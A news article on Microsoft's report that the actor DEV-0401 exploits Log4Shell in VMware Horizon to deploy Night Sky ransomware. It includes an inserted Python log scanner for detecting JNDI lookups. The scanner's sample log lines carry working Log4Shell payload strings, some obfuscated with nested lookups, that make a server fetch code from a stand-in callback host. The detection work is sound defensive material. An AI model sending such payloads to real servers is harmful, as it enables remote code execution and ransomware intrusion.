
Microsoft: China-based ransomware actor exploiting Log4Shell

According to Microsoft, a threat actor tracked as DEV-0401 is utilizing Night Sky ransomware in its Log4j attacks, a variant first reported Jan. 1 that targets large enterprises.

A threat actor is exploiting Log4Shell to deploy a new ransomware variant, according to Microsoft.

The details came via a Monday update to Microsoft's security guidance post dedicated to CVE-2021-44228, also called Log4Shell. It's a critical (CVSS 10.0) remote code execution vulnerability in Apache Log4j 2, the ubiquitous Java logging library: any attacker-controlled string that reaches a log statement, such as a User-Agent header or a query parameter, can carry a `${jndi:...}` lookup that makes the server fetch and run code from an attacker-controlled LDAP or RMI endpoint. It was disclosed last month (December 2021) and quickly gained infamy both for how trivial it is to exploit and for how many products embed the library.

Microsoft's update called attention to a China-based ransomware operator, tracked as DEV-0401, that the company said was exploiting CVE-2021-44228 as early as Jan. 4. According to the post, the threat actor was targeting internet-facing servers running vulnerable instances of VMware Horizon, VMware's virtual desktop (VDI) platform, whose server components embed Log4j and are covered by VMware's Log4j advisory.

VMware Horizon-related Log4Shell exploitation is not new. NHS Digital, the IT arm of the U.K.'s National Health Service, reported last week that it had observed attackers exploiting Log4Shell on internet-facing Horizon servers to plant web shells. A web shell matters beyond the initial intrusion: it gives the attacker persistent command execution on the server, so patching Log4j afterwards does not evict them, and the hosts must be checked for the shell itself.
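The exploitation attempts described above arrive as `${jndi:...}` lookup strings in whatever request field ends up being logged, and attackers routinely wrap the `jndi` token in nested lookups such as `${lower:j}` or `${::-j}` to slip past naive string matching. The Python below is an added example, not code from the article, from Microsoft's post or from NHS Digital's advisory: it folds those common obfuscations, then extracts the scheme, host and port of the attacker's callback server from each matching line. The access-log lines are constructed for the example and use documentation IP ranges; the obfuscation forms handled are assumed to be the common ones, not an exhaustive list.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article, Microsoft or NHS Digital).
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges. Line 2 carries the
# payload in the User-Agent, line 3 in the query string with ${lower:} wrapping,
# line 4 in the User-Agent using the ${name:-default} trick with empty names.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jan/2022:10:12:01 +0000] "GET /portal/ HTTP/1.1" 200 1512 "-" "Mozilla/5.0"
203.0.113.8 - - [04/Jan/2022:10:12:05 +0000] "GET /portal/ HTTP/1.1" 200 1512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
203.0.113.9 - - [04/Jan/2022:10:12:09 +0000] "GET /portal/?x=${${lower:j}ndi:${lower:l}dap://198.51.100.9:1389/b} HTTP/1.1" 400 0 "-" "curl/7.79"
203.0.113.10 - - [04/Jan/2022:10:12:11 +0000] "GET /portal/ HTTP/1.1" 200 1512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9:1099/c}"
"""

# A Log4j lookup with no further lookup nested inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# A resolved lookup: ${jndi:<scheme>://<host>[:<port>]...}
JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*(?P<host>[^/\s}:]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def deobfuscate(s: str, max_rounds: int = 20) -> str:
    """Fold the lookup tricks commonly used to hide the literal 'jndi' token.

    Three forms are handled (an assumption about what is common, not a full list):
    ${lower:x}, ${upper:x}, and ${name:-default}, where attackers leave the name
    empty or unresolvable so that Log4j substitutes the default. Resolution runs
    innermost-first, the same order Log4j's own string substitution uses.
    """
    for _ in range(max_rounds):
        changed = False

        def fold(m: re.Match) -> str:
            nonlocal changed
            body = m.group(1)
            head = body.lower()
            if head.startswith("lower:"):
                changed = True
                return body[6:].lower()
            if head.startswith("upper:"):
                changed = True
                return body[6:].upper()
            if ":-" in body:
                changed = True
                return body.split(":-", 1)[1]
            return m.group(0)  # a real lookup such as ${jndi:...}; keep it as is

        s = INNERMOST.sub(fold, s)
        if not changed:
            break
    return s


@dataclass
class Hit:
    line_no: int
    scheme: str
    host: str
    port: Optional[str]
    lookup: str  # the resolved ${jndi:...} prefix that matched


def scan(log_text: str) -> List[Hit]:
    """Return one Hit per log line carrying a JNDI lookup, after URL-decoding and
    de-obfuscation. The whole line is scanned, so the payload is found whether it
    sits in the path, the query string or a logged header such as User-Agent."""
    hits: List[Hit] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        decoded = deobfuscate(unquote(line))
        m = JNDI.search(decoded)
        if m:
            hits.append(Hit(n, m["scheme"].lower(), m["host"], m["port"], m.group(0)))
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.scheme} callback to {h.host}:{h.port or '?'}  ({h.lookup})")
```

The callback host and port are what a responder wants out of this: they go straight onto the egress block list and into the DNS and proxy logs to see whether any server actually connected back, which is the difference between an attempt and a compromise. Two caveats: the scan only sees fields the web server chose to log, so a payload delivered in a header the access log omits leaves no trace here, and a clean scan says nothing about hosts that were hit before logging was retained; both are reasons to check the Horizon servers themselves for web shells rather than relying on log review alone.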

In a statement to SearchSecurity, a VMware spokesperson said the company continues to urge customers to apply the latest guidance according to its security advisory (VMSA-2021-0028), and that "the security of our customers is our top priority at VMware as we respond to the industry-wide Apache Software Foundation Log4j vulnerabilities."

"Any service connected to the internet and not yet patched for Log4j vulnerabilities is vulnerable to hackers, and VMware strongly recommends taking immediate action," the spokesperson said.

Microsoft said DEV-0401's command-and-control (C2) infrastructure uses domains that impersonate legitimate security vendors, such as a "trendmrcio" lookalike of Trend Micro and a Sophos-themed domain, so that callbacks from compromised servers blend in with traffic an administrator would expect to see.

For this campaign, Microsoft said DEV-0401 is using Night Sky ransomware, a variant first reported by security research collective MalwareHunterTeam on Jan. 1 that targets large enterprises. The actor has also utilized other ransomware variants.

"DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473)," the post read.

Since Log4Shell was first reported in early December, attacks against vulnerable organizations have been constant. In addition to financially motivated threat actors, nation-state actors from countries like China, North Korea, Turkey and Iran have been observed exploiting the flaw.

It is unknown whether DEV-0401 is acting in a ransomware-as-a-service capacity or contractor capacity. Microsoft declined SearchSecurity's request for clarification.

Alexander Culafi is a writer, journalist and podcaster based in Boston.
